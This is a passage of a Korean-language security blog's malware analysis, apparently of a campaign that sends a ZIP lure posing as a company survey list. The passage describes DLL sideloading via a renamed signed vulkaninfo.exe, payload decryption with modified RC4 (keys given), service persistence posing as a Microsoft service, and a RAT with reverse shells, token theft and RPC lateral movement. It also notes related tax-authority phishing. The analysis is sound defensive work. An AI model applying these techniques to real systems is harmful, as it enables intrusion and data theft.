&lt;li&gt;&lt;b&gt; &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;기업&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;조사&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;명단.exe&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;: 정상 서명된 Intel 그래픽 유틸리티(&lt;/span&gt;&lt;span&gt;vulkaninfo.exe&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;파일&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt; &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;vulkan-1.dll&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;: 정상 실행 파일&lt;/span&gt;&lt;span&gt;(기업 조사&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;명단.exe&lt;/span&gt;&lt;span&gt;)&lt;/span&gt;&lt;span&gt;이 실행될 때 자동으로 로드되는&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;악성 DLL 파일&lt;/span&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt; &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;vulkan-1.bin&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;: 암호화된&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;쉘&lt;/span&gt;&lt;span&gt;코드&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;span&gt;백도어&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;페이로드&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;C2&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;설정&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;정보가&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;담긴&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;데이&lt;/span&gt;&lt;span&gt;터&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;파일&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: left;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;529&quot; data-origin-height=&quot;266&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bfMXcn/dJMcagLFE18/pRAUWqRHw4zhqm9ypRXL1k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bfMXcn/dJMcagLFE18/pRAUWqRHw4zhqm9ypRXL1k/img.png&quot; data-alt=&quot;[그림 2] 기업 조사 명단.zip 내부 파일&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bfMXcn/dJMcagLFE18/pRAUWqRHw4zhqm9ypRXL1k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbfMXcn%2FdJMcagLFE18%2FpRAUWqRHw4zhqm9ypRXL1k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;529&quot; height=&quot;266&quot; data-origin-width=&quot;529&quot; data-origin-height=&quot;266&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 2] 기업 조사 명단.zip 내부 파일&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격 흐름&amp;nbsp;&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;1) DLL&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;사이드로딩&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;(Sideloading)&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;사용자가&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&amp;lsquo;&lt;/span&gt;&lt;span&gt;기업&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;조사 명단.exe&lt;/span&gt;&lt;span&gt;&amp;rsquo;&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;파일을 실행하면&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;DLL&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;사이드로딩&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;기법을&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;통해&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;동일&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;경로에 위치한&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;vulkan-1.dll&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;파일이 로드되어 실행됩니다.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;DLL 사이드로딩(Sideloading)은 &amp;nbsp;Windows의 DLL 검색&amp;nbsp;순서(DLL&amp;nbsp;Search&amp;nbsp;Order)를&amp;nbsp;악용하는&amp;nbsp;공격&amp;nbsp;기법입니다.&amp;nbsp; &lt;br /&gt;프로그램&amp;nbsp;실행&amp;nbsp;시&amp;nbsp;필요한 DLL을&amp;nbsp;찾기&amp;nbsp;위해&amp;nbsp;여러&amp;nbsp;경로를&amp;nbsp;검색하는데, 정상&amp;nbsp;프로그램과&amp;nbsp;동일한&amp;nbsp;경로내&amp;nbsp;악성 DLL 파일을&amp;nbsp;위치시켜&amp;nbsp;악성 DLL 파일이&amp;nbsp;먼저&amp;nbsp;로드되도록&amp;nbsp;조작하는&amp;nbsp;방식입니다.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;2) v&lt;/span&gt;&lt;span&gt;ulkan-1.bin&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;파일 내부&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;페이로드 복호화&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: #ffffff; color: #000000; text-align: start;&quot;&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;실행된&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;DLL&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;파일은&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;동일&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;경로의&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;vulkan-1.bin&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;파일에서&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;데이터를&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;읽어온&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;후,&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span data-contrast=&quot;auto&quot;&gt;&lt;span&gt;RC4를 변형한 알고리즘(&lt;/span&gt;&lt;span&gt;Modified&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;RC4)을 사용하여&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;쉘&lt;/span&gt;&lt;span&gt;코드와&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;백도어&lt;/span&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;페이로드&lt;/span&gt;&lt;span&gt;를&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;복호화&lt;/span&gt;&lt;span&gt;합니다&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;letter-spacing: 0px;&quot; data-contrast=&quot;auto&quot;&gt;vulkan-1.bin&lt;/span&gt;&lt;span style=&quot;letter-spacing: 0px;&quot; data-contrast=&quot;auto&quot;&gt;&amp;nbsp;파일 내부는&amp;nbsp;크게 세&amp;nbsp;영역으로 구성되어 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #000000; text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 27.6357%; text-align: center;&quot;&gt;구성&lt;/td&gt;
&lt;td style=&quot;width: 15.3099%; text-align: center;&quot;&gt;크기&lt;/td&gt;
&lt;td style=&quot;width: 57.0543%; text-align: center;&quot;&gt;설명&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 27.6357%;&quot;&gt;쉘코드&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 15.3099%;&quot;&gt;3,992&amp;nbsp;bytes&lt;/td&gt;
&lt;td style=&quot;width: 57.0543%;&quot;&gt;암호화된&amp;nbsp;PE를&amp;nbsp;복호화하고&amp;nbsp;메모리에서&amp;nbsp;직접&amp;nbsp;로드&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 27.6357%;&quot;&gt;암호화된&amp;nbsp;백도어&amp;nbsp;DLL&lt;/td&gt;
&lt;td style=&quot;width: 15.3099%;&quot;&gt;291,840&amp;nbsp;bytes&lt;/td&gt;
&lt;td style=&quot;width: 57.0543%;&quot;&gt;변형&amp;nbsp;RC4&amp;nbsp;암호화&amp;nbsp;(키: 727e032b7352365566f69b9851)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 27.6357%;&quot;&gt;암호화된&amp;nbsp;C2&amp;nbsp;설정값&lt;/td&gt;
&lt;td style=&quot;width: 15.3099%;&quot;&gt;2,696&amp;nbsp;bytes&lt;/td&gt;
&lt;td style=&quot;width: 57.0543%;&quot;&gt;변형 RC4 암호화 (키: 01 02 03 04 05) C2&amp;nbsp;서버&amp;nbsp;주소,&amp;nbsp;서비스명&amp;nbsp;등&amp;nbsp;포함&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 1] &lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: center;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;vulkan-1.bin&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: center;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;파일 내부 구조&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: center;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;&lt;b&gt;3)&amp;nbsp;백도어&amp;nbsp;실행&amp;nbsp;및&amp;nbsp;지속성&amp;nbsp;등록&amp;nbsp;&lt;/b&gt; &lt;br /&gt;&lt;br /&gt;복호화된 쉘코드가 메모리에서 직접 백도어(RAT)를 실행하며, 실행된 백도어는 C:\Program Files\Common Files\ 경로에 구성 파일들 (444.exe, vulkan-1.dll, vulkan-1.bin)을 복사하고, Microsoft Compatibility system이라는 이름으로 서비스를 등록합니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: center;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;해당&amp;nbsp;서비스명은&amp;nbsp;Microsoft&amp;nbsp;정상&amp;nbsp;서비스와&amp;nbsp;유사하게&amp;nbsp;보이도록&amp;nbsp;의도적으로&amp;nbsp;설정한&amp;nbsp;것으로&amp;nbsp;판단되며,&amp;nbsp;이후&amp;nbsp;시스템&amp;nbsp;재부팅&amp;nbsp;시에도 444.exe&amp;nbsp;파일이&amp;nbsp;자동&amp;nbsp;실행되어&amp;nbsp;악성&amp;nbsp;DLL을&amp;nbsp;다시&amp;nbsp;로드하는&amp;nbsp;구조입니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #000000; text-align: center;&quot; data-contrast=&quot;auto&quot;&gt;&lt;span&gt;vulkan-1.bin&amp;nbsp;파일&amp;nbsp;내부의&amp;nbsp;C2&amp;nbsp;설정값은 %APPDATA%\install\install.cfg&amp;nbsp;파일로도&amp;nbsp;저장되어&amp;nbsp;이후&amp;nbsp;실행&amp;nbsp;시&amp;nbsp;재로드하는&amp;nbsp;방식이며,&amp;nbsp;C2&amp;nbsp;서버에서&amp;nbsp;해당&amp;nbsp;파일을&amp;nbsp;교체하는&amp;nbsp;방식으로&amp;nbsp;C2&amp;nbsp;주소를&amp;nbsp;원격에서&amp;nbsp;업데이트할&amp;nbsp;수&amp;nbsp;있습니다.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;최종&amp;nbsp;페이로드(Backdoor)&amp;nbsp;주요&amp;nbsp;기능&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당&amp;nbsp;악성코드는&amp;nbsp;원격&amp;nbsp;제어,권한&amp;nbsp;상승,프로세스&amp;nbsp;인젝션&amp;nbsp;등을&amp;nbsp;수행할&amp;nbsp;수&amp;nbsp;있는&amp;nbsp;백도어로&amp;nbsp;다음과&amp;nbsp;같은&amp;nbsp;악성행위를&amp;nbsp;수행합니다.&amp;nbsp;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;프로세스&amp;nbsp;인젝션&lt;/b&gt;:&amp;nbsp;실행&amp;nbsp;중인&amp;nbsp;정상&amp;nbsp;프로세스의&amp;nbsp;메모리에&amp;nbsp;악성&amp;nbsp;코드를&amp;nbsp;삽입하여&amp;nbsp;실행하는&amp;nbsp;인젝션&amp;nbsp;기능&amp;nbsp;지원&lt;/li&gt;
&lt;li&gt;&lt;b&gt;권한&amp;nbsp;상승&amp;nbsp;및&amp;nbsp;토큰&amp;nbsp;탈취&lt;/b&gt;:&amp;nbsp;현재&amp;nbsp;로그온&amp;nbsp;된&amp;nbsp;다른&amp;nbsp;사용자&amp;nbsp;세션의&amp;nbsp;토큰을&amp;nbsp;탈취하여&amp;nbsp;해당&amp;nbsp;권한으로&amp;nbsp;프로세스를&amp;nbsp;실행&lt;/li&gt;
&lt;li&gt;&lt;b&gt;C2&amp;nbsp;통신&lt;/b&gt;:&amp;nbsp;아웃바운드&amp;nbsp;연결(리버스&amp;nbsp;쉘)과&amp;nbsp;인바운드&amp;nbsp;대기(바인드&amp;nbsp;쉘)를&amp;nbsp;모두&amp;nbsp;지원,&amp;nbsp;암호화&amp;nbsp;및&amp;nbsp;압축&amp;nbsp;라이브러리(libwebsockets,&amp;nbsp;zlib)를&amp;nbsp;내장하여&amp;nbsp;외부&amp;nbsp;의존성&amp;nbsp;없이&amp;nbsp;독립적으로&amp;nbsp;동작&amp;nbsp;가능&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;파일&amp;nbsp;시스템&amp;nbsp;조작&amp;nbsp;및&amp;nbsp;정보&amp;nbsp;수집&lt;/b&gt;:&amp;nbsp;감염&amp;nbsp;시스템&amp;nbsp;내&amp;nbsp;파일&amp;nbsp;조작&amp;nbsp;및&amp;nbsp;외부&amp;nbsp;탈취가&amp;nbsp;가능하며,&amp;nbsp;프로세스,서비스&amp;nbsp;목록&amp;nbsp;등&amp;nbsp;시스템&amp;nbsp;정보&amp;nbsp;수집&lt;/li&gt;
&lt;li&gt;&lt;b&gt;RPC를&amp;nbsp;통한&amp;nbsp;내부망&amp;nbsp;횡적&amp;nbsp;이동&lt;/b&gt;:&amp;nbsp;RPC(Remote&amp;nbsp;Procedure&amp;nbsp;Call,&amp;nbsp;원격&amp;nbsp;프로시저&amp;nbsp;호출)는&amp;nbsp;네트워크로&amp;nbsp;연결된&amp;nbsp;다른&amp;nbsp;컴퓨터의&amp;nbsp;기능을&amp;nbsp;원격으로&amp;nbsp;실행할&amp;nbsp;수&amp;nbsp;있게&amp;nbsp;해주는&amp;nbsp;통신&amp;nbsp;방식으로,&amp;nbsp;최초&amp;nbsp;감염&amp;nbsp;시스템을&amp;nbsp;통해&amp;nbsp;내부망의&amp;nbsp;다른&amp;nbsp;시스템으로&amp;nbsp;이동&amp;nbsp;가능&lt;/li&gt;
&lt;li&gt;&lt;b&gt;안티&amp;nbsp;디버깅&amp;nbsp;및&amp;nbsp;안티&amp;nbsp;분석&lt;/b&gt;:&amp;nbsp;커널&amp;nbsp;레벨에서&amp;nbsp;디버거&amp;nbsp;탐지&amp;nbsp;및&amp;nbsp;가상&amp;nbsp;환경&amp;nbsp;감지&amp;nbsp;시&amp;nbsp;블루스크린(BSOD)을&amp;nbsp;유발하여&amp;nbsp;동적&amp;nbsp;분석&amp;nbsp;무력화&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; font-size: 22px; margin: 30px 0 15px 0; border-bottom: 1px solid #e0e0e0; font-family: 'Pretendard', sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size26&quot;&gt;공격자&amp;nbsp;서버에서&amp;nbsp;확인된&amp;nbsp;추가&amp;nbsp;파일&lt;/h2&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;분석&amp;nbsp;과정에서&amp;nbsp;공격자&amp;nbsp;인프라를&amp;nbsp;조사하던&amp;nbsp;중&amp;nbsp;공격자의&amp;nbsp;서버에서&amp;nbsp;다수의&amp;nbsp;변종&amp;nbsp;파일을&amp;nbsp;발견했으며,&amp;nbsp;다른&amp;nbsp;언어로&amp;nbsp;제작된&amp;nbsp;피싱&amp;nbsp;사이트와&amp;nbsp;피싱&amp;nbsp;메일도&amp;nbsp;확인되었습니다.&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;해당&amp;nbsp;피싱&amp;nbsp;사이트는&amp;nbsp;이번&amp;nbsp;공격과&amp;nbsp;동일한&amp;nbsp;방식으로&amp;nbsp;말레이시아&amp;nbsp;국세청(LHDN)을&amp;nbsp;사칭한&amp;nbsp;것으로&amp;nbsp;확인되었습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;701&quot; data-origin-height=&quot;725&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/T1CdI/dJMcabjiJQg/RhTUppB0Ba5XjlagnQDkqk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/T1CdI/dJMcabjiJQg/RhTUppB0Ba5XjlagnQDkqk/img.png&quot; data-alt=&quot;[그림 3] 말레이시아 국세청 사칭 피싱&amp;amp;nbsp; 사이트&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/T1CdI/dJMcabjiJQg/RhTUppB0Ba5XjlagnQDkqk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FT1CdI%2FdJMcabjiJQg%2FRhTUppB0Ba5XjlagnQDkqk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;701&quot; height=&quot;725&quot; data-origin-width=&quot;701&quot; data-origin-height=&quot;725&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[그림 3] 말레이시아 국세청 사칭 피싱&amp;nbsp; 사이트&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;피싱&amp;nbsp;메일은&amp;nbsp;인도&amp;nbsp;공영어&amp;nbsp;중의&amp;nbsp;하나&amp;nbsp;인&amp;nbsp;힌디어로&amp;nbsp;작성되었으며,&amp;nbsp;인도&amp;nbsp;법원&amp;nbsp;통지&amp;nbsp;내용으로&amp;nbsp;인도&amp;nbsp;정부&amp;nbsp;소득세청으로&amp;nbsp;위장했습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
